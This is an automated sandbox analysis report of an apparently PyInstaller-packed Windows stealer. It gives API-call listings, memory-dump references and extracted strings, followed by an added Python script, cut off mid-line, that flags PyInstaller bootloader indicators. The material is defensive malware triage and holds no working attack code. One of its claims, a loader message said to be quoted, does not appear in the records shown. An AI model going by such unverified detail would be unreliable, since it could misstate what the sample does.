• API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
• String ID:
• API String ID: 3140674995-0
                                                              APIs
                                                              • _get_daylight.LIBCMT ref: 00007FF6FB204F55
                                                                • Part of subcall function 00007FF6FB2048A8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6FB2048BC
                                                                • Part of subcall function 00007FF6FB1F9C58: HeapFree.KERNEL32(?,?,?,00007FF6FB202032,?,?,?,00007FF6FB20206F,?,?,00000000,00007FF6FB202535,?,?,?,00007FF6FB202467), ref: 00007FF6FB1F9C6E
                                                                • Part of subcall function 00007FF6FB1F9C58: GetLastError.KERNEL32(?,?,?,00007FF6FB202032,?,?,?,00007FF6FB20206F,?,?,00000000,00007FF6FB202535,?,?,?,00007FF6FB202467), ref: 00007FF6FB1F9C78
                                                                • Part of subcall function 00007FF6FB1F9C10: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF6FB1F9BEF,?,?,?,?,?,00007FF6FB1F9ADA), ref: 00007FF6FB1F9C19
                                                                • Part of subcall function 00007FF6FB1F9C10: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF6FB1F9BEF,?,?,?,?,?,00007FF6FB1F9ADA), ref: 00007FF6FB1F9C3E
                                                              • _get_daylight.LIBCMT ref: 00007FF6FB204F44
                                                                • Part of subcall function 00007FF6FB204908: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6FB20491C
                                                              • _get_daylight.LIBCMT ref: 00007FF6FB2051BA
                                                              • _get_daylight.LIBCMT ref: 00007FF6FB2051CB
                                                              • _get_daylight.LIBCMT ref: 00007FF6FB2051DC
                                                              • GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF6FB20541C), ref: 00007FF6FB205203
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1989528263.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              Similarity
                                                              • API ID: _get_daylight$_invalid_parameter_noinfo$CurrentErrorFeatureFreeHeapInformationLastPresentProcessProcessorTimeZone
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1989528263.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              Similarity
                                                              • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1989528263.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              Similarity
                                                              • API ID: FileFindFirst_invalid_parameter_noinfo
                                                              APIs
                                                              • _get_daylight.LIBCMT ref: 00007FF6FB2051BA
                                                                • Part of subcall function 00007FF6FB204908: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6FB20491C
                                                              • _get_daylight.LIBCMT ref: 00007FF6FB2051CB
                                                                • Part of subcall function 00007FF6FB2048A8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6FB2048BC
                                                              • _get_daylight.LIBCMT ref: 00007FF6FB2051DC
                                                                • Part of subcall function 00007FF6FB2048D8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6FB2048EC
                                                                • Part of subcall function 00007FF6FB1F9C58: HeapFree.KERNEL32(?,?,?,00007FF6FB202032,?,?,?,00007FF6FB20206F,?,?,00000000,00007FF6FB202535,?,?,?,00007FF6FB202467), ref: 00007FF6FB1F9C6E
                                                                • Part of subcall function 00007FF6FB1F9C58: GetLastError.KERNEL32(?,?,?,00007FF6FB202032,?,?,?,00007FF6FB20206F,?,?,00000000,00007FF6FB202535,?,?,?,00007FF6FB202467), ref: 00007FF6FB1F9C78
                                                              • GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF6FB20541C), ref: 00007FF6FB205203
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1989528263.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              Similarity
                                                              • API ID: _get_daylight_invalid_parameter_noinfo$ErrorFreeHeapInformationLastTimeZone
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1991624093.00007FFDFB381000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00007FFDFB380000, based on PE: true
                                                              Similarity
                                                              • API ID: 00007
                                                              • String ID: ..\s\ssl\statem\extensions_srvr.c$D:\_w\1\s\ssl\packet_local.h
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1989811289.00007FFDFAEE1000.00000040.00000001.01000000.00000013.sdmp, Offset: 00007FFDFAEE0000, based on PE: true
                                                              Similarity
                                                              • API ID: 00007
                                                              • String ID: 0
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1990278020.00007FFDFB001000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFDFB000000, based on PE: true
                                                              Similarity
                                                              • API ID: ErrorLastbind
                                                              • String ID: ..\s\crypto\bio\b_sock2.c
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1990278020.00007FFDFB001000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFDFB000000, based on PE: true
                                                               • Associated: 00000001.00000002.1990234767.00007FFDFB000000.00000002.00000001.01000000.00000010.sdmp
                                                               • Associated: 00000001.00000002.1990278020.00007FFDFB00D000.00000040.00000001.01000000.00000010.sdmp
                                                               • Associated: 00000001.00000002.1990278020.00007FFDFB065000.00000040.00000001.01000000.00000010.sdmp
                                                               • Associated: 00000001.00000002.1990278020.00007FFDFB079000.00000040.00000001.01000000.00000010.sdmp
                                                               • Associated: 00000001.00000002.1990278020.00007FFDFB08A000.00000040.00000001.01000000.00000010.sdmp
                                                               • Associated: 00000001.00000002.1990278020.00007FFDFB090000.00000040.00000001.01000000.00000010.sdmp
                                                               • Associated: 00000001.00000002.1990278020.00007FFDFB09D000.00000040.00000001.01000000.00000010.sdmp
                                                               • Associated: 00000001.00000002.1990278020.00007FFDFB24D000.00000040.00000001.01000000.00000010.sdmp
                                                               • Associated: 00000001.00000002.1990278020.00007FFDFB24F000.00000040.00000001.01000000.00000010.sdmp
                                                               • Associated: 00000001.00000002.1990278020.00007FFDFB27A000.00000040.00000001.01000000.00000010.sdmp
                                                               • Associated: 00000001.00000002.1990278020.00007FFDFB2AB000.00000040.00000001.01000000.00000010.sdmp
                                                               • Associated: 00000001.00000002.1990278020.00007FFDFB2D1000.00000040.00000001.01000000.00000010.sdmp
                                                               • Associated: 00000001.00000002.1990278020.00007FFDFB31F000.00000040.00000001.01000000.00000010.sdmp
                                                               • Associated: 00000001.00000002.1990278020.00007FFDFB325000.00000040.00000001.01000000.00000010.sdmp
                                                               • Associated: 00000001.00000002.1990278020.00007FFDFB327000.00000040.00000001.01000000.00000010.sdmp
                                                               • Associated: 00000001.00000002.1990278020.00007FFDFB343000.00000040.00000001.01000000.00000010.sdmp
                                                               • Associated: 00000001.00000002.1990278020.00007FFDFB350000.00000040.00000001.01000000.00000010.sdmp
                                                               • Associated: 00000001.00000002.1991500652.00007FFDFB354000.00000080.00000001.01000000.00000010.sdmp
                                                               • Associated: 00000001.00000002.1991539153.00007FFDFB356000.00000004.00000001.01000000.00000010.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7ffdfb000000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 7c56cf6a6487dceeb00cd67b5ea337eb2185dad23aeb4fdd049dd72e8a09a134
                                                              • Instruction ID: 37abe064c7f6f5615cf2cebfad5c32c21055ccf531f4b337ddaf029ccdf80933
                                                              • Opcode Fuzzy Hash: 7c56cf6a6487dceeb00cd67b5ea337eb2185dad23aeb4fdd049dd72e8a09a134
                                                              • Instruction Fuzzy Hash: E5A002F4B15556296F6503615251B7806431A493CA8E29470A479112984A1CA150A150
                                                              APIs
                                                              • GetProcAddress.KERNEL32(?,00007FF6FB1E5C57,?,00007FF6FB1E308E), ref: 00007FF6FB1E50C0
                                                              • GetProcAddress.KERNEL32(?,00007FF6FB1E5C57,?,00007FF6FB1E308E), ref: 00007FF6FB1E5101
                                                              • GetProcAddress.KERNEL32(?,00007FF6FB1E5C57,?,00007FF6FB1E308E), ref: 00007FF6FB1E5126
                                                              • GetProcAddress.KERNEL32(?,00007FF6FB1E5C57,?,00007FF6FB1E308E), ref: 00007FF6FB1E514B
                                                              • GetProcAddress.KERNEL32(?,00007FF6FB1E5C57,?,00007FF6FB1E308E), ref: 00007FF6FB1E5173
                                                              • GetProcAddress.KERNEL32(?,00007FF6FB1E5C57,?,00007FF6FB1E308E), ref: 00007FF6FB1E519B
                                                              • GetProcAddress.KERNEL32(?,00007FF6FB1E5C57,?,00007FF6FB1E308E), ref: 00007FF6FB1E51C3
                                                              • GetProcAddress.KERNEL32(?,00007FF6FB1E5C57,?,00007FF6FB1E308E), ref: 00007FF6FB1E51EB
                                                              • GetProcAddress.KERNEL32(?,00007FF6FB1E5C57,?,00007FF6FB1E308E), ref: 00007FF6FB1E5213
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1989528263.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                               • Associated: 00000001.00000002.1989488665.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000001.00000002.1989584297.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000001.00000002.1989640265.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000001.00000002.1989640265.00007FF6FB223000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000001.00000002.1989725163.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: AddressProc
                                                              • String ID: Failed to get address for %hs$GetProcAddress$PyConfig_Clear$PyConfig_InitIsolatedConfig$PyConfig_Read$PyConfig_SetBytesString$PyConfig_SetString$PyConfig_SetWideStringList$PyErr_Clear$PyErr_Fetch$PyErr_NormalizeException$PyErr_Occurred$PyErr_Print$PyErr_Restore$PyEval_EvalCode$PyImport_AddModule$PyImport_ExecCodeModule$PyImport_ImportModule$PyList_Append$PyMarshal_ReadObjectFromString$PyMem_RawFree$PyModule_GetDict$PyObject_CallFunction$PyObject_CallFunctionObjArgs$PyObject_GetAttrString$PyObject_SetAttrString$PyObject_Str$PyPreConfig_InitIsolatedConfig$PyRun_SimpleStringFlags$PyStatus_Exception$PySys_GetObject$PySys_SetObject$PyUnicode_AsUTF8$PyUnicode_Decode$PyUnicode_DecodeFSDefault$PyUnicode_FromFormat$PyUnicode_FromString$PyUnicode_Join$PyUnicode_Replace$Py_DecRef$Py_DecodeLocale$Py_ExitStatusException$Py_Finalize$Py_InitializeFromConfig$Py_IsInitialized$Py_PreInitialize
                                                              • API String ID: 190572456-2007157414
                                                              • Opcode ID: 3c804ccaf4812c993b4970aca99c844c8aa25bcf6244ab31ff714926eb913965
                                                              • Instruction ID: 64fc361415386140762d15d431bcb8a047f2fe96515796d1914d3aec1433a503
                                                              • Opcode Fuzzy Hash: 3c804ccaf4812c993b4970aca99c844c8aa25bcf6244ab31ff714926eb913965
                                                              • Instruction Fuzzy Hash: 521264A4D1DB0395FB65DB08AAB41B822A1AF4C794F946435D83ED2AF0FF7CB5488340
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1989528263.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                               • Associated: 00000001.00000002.1989488665.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000001.00000002.1989584297.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000001.00000002.1989640265.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000001.00000002.1989640265.00007FF6FB223000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000001.00000002.1989725163.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: AddressProc
                                                              • String ID: Failed to get address for %hs$GetProcAddress$Tcl_Alloc$Tcl_ConditionFinalize$Tcl_ConditionNotify$Tcl_ConditionWait$Tcl_CreateInterp$Tcl_CreateObjCommand$Tcl_CreateThread$Tcl_DeleteInterp$Tcl_DoOneEvent$Tcl_EvalEx$Tcl_EvalFile$Tcl_EvalObjv$Tcl_Finalize$Tcl_FinalizeThread$Tcl_FindExecutable$Tcl_Free$Tcl_GetCurrentThread$Tcl_GetObjResult$Tcl_GetString$Tcl_GetVar2$Tcl_Init$Tcl_JoinThread$Tcl_MutexFinalize$Tcl_MutexLock$Tcl_MutexUnlock$Tcl_NewByteArrayObj$Tcl_NewStringObj$Tcl_SetVar2$Tcl_SetVar2Ex$Tcl_ThreadAlert$Tcl_ThreadQueueEvent$Tk_GetNumMainWindows$Tk_Init
                                                              • API String ID: 190572456-3427451314
                                                              • Opcode ID: ea7dfca1e90abb6d4d8c6eb1b798acaf406610e772db9aaa2d8df727af0780f5
                                                              • Instruction ID: 2ea597ca4e0d9f415ebdc688b2cc56dbad77a80652fe467aaab850adfbfd1a4a
                                                              • Opcode Fuzzy Hash: ea7dfca1e90abb6d4d8c6eb1b798acaf406610e772db9aaa2d8df727af0780f5
                                                              • Instruction Fuzzy Hash: 20E17268E1AB4395FB55DB14AAA41B863A5AF1C7D4F946436C83EC26F4FF3CB5488300
                                                              APIs
                                                              • 00007FFE1FFB5630.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00007FFDFB1B4D03,?,?,?,?,?,?,?,?,00007FFDFB1B2D3B), ref: 00007FFDFB1B4111
                                                              • 00007FFE1FFB5630.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00007FFDFB1B4D03,?,?,?,?,?,?,?,?,00007FFDFB1B2D3B), ref: 00007FFDFB1B4128
                                                              • 00007FFE1FFB5630.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00007FFDFB1B4D03,?,?,?,?,?,?,?,?,00007FFDFB1B2D3B), ref: 00007FFDFB1B413F
                                                              • 00007FFE1FFB5630.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00007FFDFB1B4D03,?,?,?,?,?,?,?,?,00007FFDFB1B2D3B), ref: 00007FFDFB1B4172
                                                              • 00007FFE1FFB5630.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00007FFDFB1B4D03,?,?,?,?,?,?,?,?,00007FFDFB1B2D3B), ref: 00007FFDFB1B41BB
                                                              • 00007FFE1FFB5630.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00007FFDFB1B4D03,?,?,?,?,?,?,?,?,00007FFDFB1B2D3B), ref: 00007FFDFB1B41EF
                                                              • 00007FFE1FFB5630.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00007FFDFB1B4D03,?,?,?,?,?,?,?,?,00007FFDFB1B2D3B), ref: 00007FFDFB1B4241
                                                              • 00007FFE1FFB5630.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00007FFDFB1B4D03,?,?,?,?,?,?,?,?,00007FFDFB1B2D3B), ref: 00007FFDFB1B4254
                                                              • 00007FFE1FFB5630.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00007FFDFB1B4D03,?,?,?,?,?,?,?,?,00007FFDFB1B2D3B), ref: 00007FFDFB1B426B
                                                              • 00007FFE1FFB5630.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00007FFDFB1B4D03,?,?,?,?,?,?,?,?,00007FFDFB1B2D3B), ref: 00007FFDFB1B427E
                                                              • 00007FFE1FFB5630.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00007FFDFB1B4D03,?,?,?,?,?,?,?,?,00007FFDFB1B2D3B), ref: 00007FFDFB1B4295
                                                              • 00007FFE1FFB5630.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00007FFDFB1B4D03,?,?,?,?,?,?,?,?,00007FFDFB1B2D3B), ref: 00007FFDFB1B42A8
                                                              • 00007FFE1FFB5630.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00007FFDFB1B4D03,?,?,?,?,?,?,?,?,00007FFDFB1B2D3B), ref: 00007FFDFB1B42BF
                                                              • 00007FFE1FFB5630.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00007FFDFB1B4D03,?,?,?,?,?,?,?,?,00007FFDFB1B2D3B), ref: 00007FFDFB1B42D2
                                                              • 00007FFE1FFB5630.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00007FFDFB1B4D03,?,?,?,?,?,?,?,?,00007FFDFB1B2D3B), ref: 00007FFDFB1B42E5
                                                              • 00007FFE1FFB5630.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00007FFDFB1B4D03,?,?,?,?,?,?,?,?,00007FFDFB1B2D3B), ref: 00007FFDFB1B42F8
                                                              • 00007FFE1FFB5630.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00007FFDFB1B4D03,?,?,?,?,?,?,?,?,00007FFDFB1B2D3B), ref: 00007FFDFB1B430B
                                                              • 00007FFE1FFB5630.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00007FFDFB1B4D03,?,?,?,?,?,?,?,?,00007FFDFB1B2D3B), ref: 00007FFDFB1B4357
                                                              • 00007FFE1FFB5630.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00007FFDFB1B4D03,?,?,?,?,?,?,?,?,00007FFDFB1B2D3B), ref: 00007FFDFB1B4382
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1990278020.00007FFDFB09D000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFDFB000000, based on PE: true
                                                               • Associated: 00000001.00000002.1990234767.00007FFDFB000000.00000002.00000001.01000000.00000010.sdmp
                                                               • Associated: 00000001.00000002.1990278020.00007FFDFB001000.00000040.00000001.01000000.00000010.sdmp
                                                               • Associated: 00000001.00000002.1990278020.00007FFDFB00D000.00000040.00000001.01000000.00000010.sdmp
                                                               • Associated: 00000001.00000002.1990278020.00007FFDFB065000.00000040.00000001.01000000.00000010.sdmp
                                                               • Associated: 00000001.00000002.1990278020.00007FFDFB079000.00000040.00000001.01000000.00000010.sdmp
                                                               • Associated: 00000001.00000002.1990278020.00007FFDFB08A000.00000040.00000001.01000000.00000010.sdmp
                                                               • Associated: 00000001.00000002.1990278020.00007FFDFB090000.00000040.00000001.01000000.00000010.sdmp
                                                               • Associated: 00000001.00000002.1990278020.00007FFDFB24D000.00000040.00000001.01000000.00000010.sdmp
                                                               • Associated: 00000001.00000002.1990278020.00007FFDFB24F000.00000040.00000001.01000000.00000010.sdmp
                                                               • Associated: 00000001.00000002.1990278020.00007FFDFB27A000.00000040.00000001.01000000.00000010.sdmp
                                                               • Associated: 00000001.00000002.1990278020.00007FFDFB2AB000.00000040.00000001.01000000.00000010.sdmp
                                                               • Associated: 00000001.00000002.1990278020.00007FFDFB2D1000.00000040.00000001.01000000.00000010.sdmp
                                                               • Associated: 00000001.00000002.1990278020.00007FFDFB31F000.00000040.00000001.01000000.00000010.sdmp
                                                               • Associated: 00000001.00000002.1990278020.00007FFDFB325000.00000040.00000001.01000000.00000010.sdmp
                                                               • Associated: 00000001.00000002.1990278020.00007FFDFB327000.00000040.00000001.01000000.00000010.sdmp
                                                               • Associated: 00000001.00000002.1990278020.00007FFDFB343000.00000040.00000001.01000000.00000010.sdmp
                                                               • Associated: 00000001.00000002.1990278020.00007FFDFB350000.00000040.00000001.01000000.00000010.sdmp
                                                               • Associated: 00000001.00000002.1991500652.00007FFDFB354000.00000080.00000001.01000000.00000010.sdmp
                                                               • Associated: 00000001.00000002.1991539153.00007FFDFB356000.00000004.00000001.01000000.00000010.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7ffdfb000000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: 00007B5630
                                                              • String ID: ANY PRIVATE KEY$CERTIFICATE$CERTIFICATE REQUEST$CMS$DH PARAMETERS$ENCRYPTED PRIVATE KEY$NEW CERTIFICATE REQUEST$PARAMETERS$PKCS #7 SIGNED DATA$PKCS7$PRIVATE KEY$TRUSTED CERTIFICATE$X509 CERTIFICATE$X9.42 DH PARAMETERS
                                                              • API String ID: 2248877218-1119032718
                                                              • Opcode ID: 88557610c1077b526ed49270ffd766f7b77ef80781f962a522a209ea931fc564
                                                              • Instruction ID: fc4c09058e97c27e1c3d6ce117edf08e9b8743f2aeb64cdb497e03515433fe70
                                                              • Opcode Fuzzy Hash: 88557610c1077b526ed49270ffd766f7b77ef80781f962a522a209ea931fc564
                                                              • Instruction Fuzzy Hash: A191F113F0E64384FF5197259970A7826D1EF56BC8F48D130D97E866FEEE1CE6248A00
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1990278020.00007FFDFB001000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFDFB000000, based on PE: true
                                                               • Associated: 00000001.00000002.1990234767.00007FFDFB000000.00000002.00000001.01000000.00000010.sdmp
                                                               • Associated: 00000001.00000002.1990278020.00007FFDFB00D000.00000040.00000001.01000000.00000010.sdmp
                                                               • Associated: 00000001.00000002.1990278020.00007FFDFB065000.00000040.00000001.01000000.00000010.sdmp
                                                               • Associated: 00000001.00000002.1990278020.00007FFDFB079000.00000040.00000001.01000000.00000010.sdmp
                                                               • Associated: 00000001.00000002.1990278020.00007FFDFB08A000.00000040.00000001.01000000.00000010.sdmp
                                                               • Associated: 00000001.00000002.1990278020.00007FFDFB090000.00000040.00000001.01000000.00000010.sdmp
                                                               • Associated: 00000001.00000002.1990278020.00007FFDFB09D000.00000040.00000001.01000000.00000010.sdmp
                                                               • Associated: 00000001.00000002.1990278020.00007FFDFB24D000.00000040.00000001.01000000.00000010.sdmp
                                                               • Associated: 00000001.00000002.1990278020.00007FFDFB24F000.00000040.00000001.01000000.00000010.sdmp
                                                               • Associated: 00000001.00000002.1990278020.00007FFDFB27A000.00000040.00000001.01000000.00000010.sdmp
                                                               • Associated: 00000001.00000002.1990278020.00007FFDFB2AB000.00000040.00000001.01000000.00000010.sdmp
                                                               • Associated: 00000001.00000002.1990278020.00007FFDFB2D1000.00000040.00000001.01000000.00000010.sdmp
                                                               • Associated: 00000001.00000002.1990278020.00007FFDFB31F000.00000040.00000001.01000000.00000010.sdmp
                                                               • Associated: 00000001.00000002.1990278020.00007FFDFB325000.00000040.00000001.01000000.00000010.sdmp
                                                               • Associated: 00000001.00000002.1990278020.00007FFDFB327000.00000040.00000001.01000000.00000010.sdmp
                                                               • Associated: 00000001.00000002.1990278020.00007FFDFB343000.00000040.00000001.01000000.00000010.sdmp
                                                               • Associated: 00000001.00000002.1990278020.00007FFDFB350000.00000040.00000001.01000000.00000010.sdmp
                                                               • Associated: 00000001.00000002.1991500652.00007FFDFB354000.00000080.00000001.01000000.00000010.sdmp
                                                               • Associated: 00000001.00000002.1991539153.00007FFDFB356000.00000004.00000001.01000000.00000010.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7ffdfb000000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: 00007B5630
                                                              • String ID: ..\s\crypto\asn1\asn_mime.c$application/pkcs7-mime$application/pkcs7-signature$application/x-pkcs7-mime$application/x-pkcs7-signature$boundary$content-type$multipart/signed$type:
                                                              • API String ID: 2248877218-3630080479
                                                              • Opcode ID: 7ebc3a45523df780ecbf5d5eee50afa3b023d1eb5b1fbd1f84c6fabd0e5d4c90
                                                              • Instruction ID: f7442fa3c227295fc19e7eadf1e6100d3195faed91a0009d77d22f7ad44b612a
                                                              • Opcode Fuzzy Hash: 7ebc3a45523df780ecbf5d5eee50afa3b023d1eb5b1fbd1f84c6fabd0e5d4c90
                                                              • Instruction Fuzzy Hash: CFC17E21B1E64781EB14EB11A861EB96391AF467C8F488031E96D477FEDF3CE505EB40
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1989528263.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                               • Associated: 00000001.00000002.1989488665.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000001.00000002.1989584297.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000001.00000002.1989640265.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000001.00000002.1989640265.00007FF6FB223000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000001.00000002.1989725163.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: Message
                                                              • String ID: Failed to create symbolic link %s!$Failed to extract %s: failed to allocate temporary buffer!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to open target file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$Failed to extract %s: failed to write data chunk!$fopen$fread$fseek$fwrite$malloc
                                                              • API String ID: 2030045667-1550345328
                                                              • Opcode ID: bfc136c924c464ef2621553932b0a9cd8dc9cfe98ff03daf035e503e87b3996c
                                                              • Instruction ID: f344059fb2ec416c9533b84e2c64572820f65bd2df5aa9520ed281a62e0ad389
                                                              • Opcode Fuzzy Hash: bfc136c924c464ef2621553932b0a9cd8dc9cfe98ff03daf035e503e87b3996c
                                                              • Instruction Fuzzy Hash: EC515565E0864392EB20DB25A9605BD22A0BF4DB98F444131EE2EC7AF5FF6CF5648740
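The three functions above in the 00007FF6FB1E0000 image (the main executable) resolve the CPython C-API and Tcl/Tk entry points by name through GetProcAddress, and carry the "Failed to extract %s: ..." and "LOADER: ... runtime-tmpdir" diagnostics of the PyInstaller bootloader, which is how this Python-based stealer is shipped as a single PE. The following triage check is an added example and is not Joe Sandbox code or code from the sample; the indicator strings are copied from the String ID fields of the records above, and the CArchive cookie magic (`MEI\x0c\x0b\x0a\x0b\x0e`) is a well-known PyInstaller marker that the report itself does not list, so it is used only as corroboration. The sample inputs are constructed byte blobs, not dumps from this analysis. A caveat the check encodes: a legitimate python3xx.dll also contains every Py* name as an export-table string, so API names alone must not be taken as evidence of a bootloader; the loader diagnostics are what distinguish it.

```python
"""Triage check for PyInstaller bootloader indicators in a PE image or memory
dump. Added example; indicator strings taken from the report's String ID fields."""
import re
from typing import Dict, List

# CPython C-API symbols resolved via GetProcAddress (String ID of the first
# GetProcAddress function above).
PY_API_NAMES = [
    b"PyConfig_InitIsolatedConfig", b"PyPreConfig_InitIsolatedConfig",
    b"Py_PreInitialize", b"Py_InitializeFromConfig",
    b"PyMarshal_ReadObjectFromString", b"PyImport_ExecCodeModule",
    b"PyRun_SimpleStringFlags", b"PyEval_EvalCode", b"Py_Finalize",
]
# Tcl/Tk symbols resolved the same way (second GetProcAddress function above).
TCL_API_NAMES = [
    b"Tcl_CreateInterp", b"Tcl_CreateThread", b"Tcl_DoOneEvent",
    b"Tk_Init", b"Tk_GetNumMainWindows",
]
# Bootloader diagnostics quoted in the report.
LOADER_MESSAGES = [
    b"Failed to get address for %hs",
    b"Failed to extract %s: failed to open archive file!",
    b"Failed to extract %s: failed to read data chunk!",
    b"LOADER: failed to create runtime-tmpdir path %ls!",
]
# PyInstaller CArchive cookie magic "MEI\014\013\012\013\016" (not in the
# report's string list; well-known marker used here only as corroboration).
MEI_MAGIC = b"MEI\x0c\x0b\x0a\x0b\x0e"


def carve_ascii_strings(data: bytes, min_len: int = 6) -> List[bytes]:
    """Printable-ASCII runs of at least min_len bytes, the same kind of list
    the String ID fields above are derived from."""
    return re.findall(rb"[\x20-\x7e]{%d,}" % min_len, data)


def pyinstaller_indicators(data: bytes) -> Dict[str, object]:
    """Count indicator hits and return a verdict.

    Verdicts:
      pyinstaller-bootloader : loader diagnostics + Py* API names present
      python-runtime-only    : Py* names present but no loader diagnostics
                               (what a plain python3xx.dll export table looks like)
      no-python-indicators   : neither
    """
    strings = set(carve_ascii_strings(data))
    py_hits = sorted(n for n in PY_API_NAMES if n in strings)
    tcl_hits = sorted(n for n in TCL_API_NAMES if n in strings)
    msg_hits = sorted(m for m in LOADER_MESSAGES if m in strings)
    cookie = MEI_MAGIC in data

    if msg_hits and len(py_hits) >= 3:
        verdict = "pyinstaller-bootloader"
    elif len(py_hits) >= 3:
        verdict = "python-runtime-only"
    else:
        verdict = "no-python-indicators"

    return {
        "py_api": py_hits,
        "tcl_api": tcl_hits,
        "loader_messages": msg_hits,
        "mei_cookie": cookie,
        "verdict": verdict,
    }


# Constructed sample inputs (not dumps from this analysis): null-separated
# strings as they would sit in an .rdata section.
BOOTLOADER_SAMPLE = (
    b"\x00".join([b"MZ"] + PY_API_NAMES + TCL_API_NAMES + LOADER_MESSAGES)
    + b"\x00" + MEI_MAGIC + b"\x00" * 16
)
PYTHON_DLL_SAMPLE = b"\x00".join(PY_API_NAMES) + b"\x00"

if __name__ == "__main__":
    for name, blob in (("bootloader", BOOTLOADER_SAMPLE), ("python-dll", PYTHON_DLL_SAMPLE)):
        r = pyinstaller_indicators(blob)
        print(name, r["verdict"], len(r["py_api"]), len(r["tcl_api"]),
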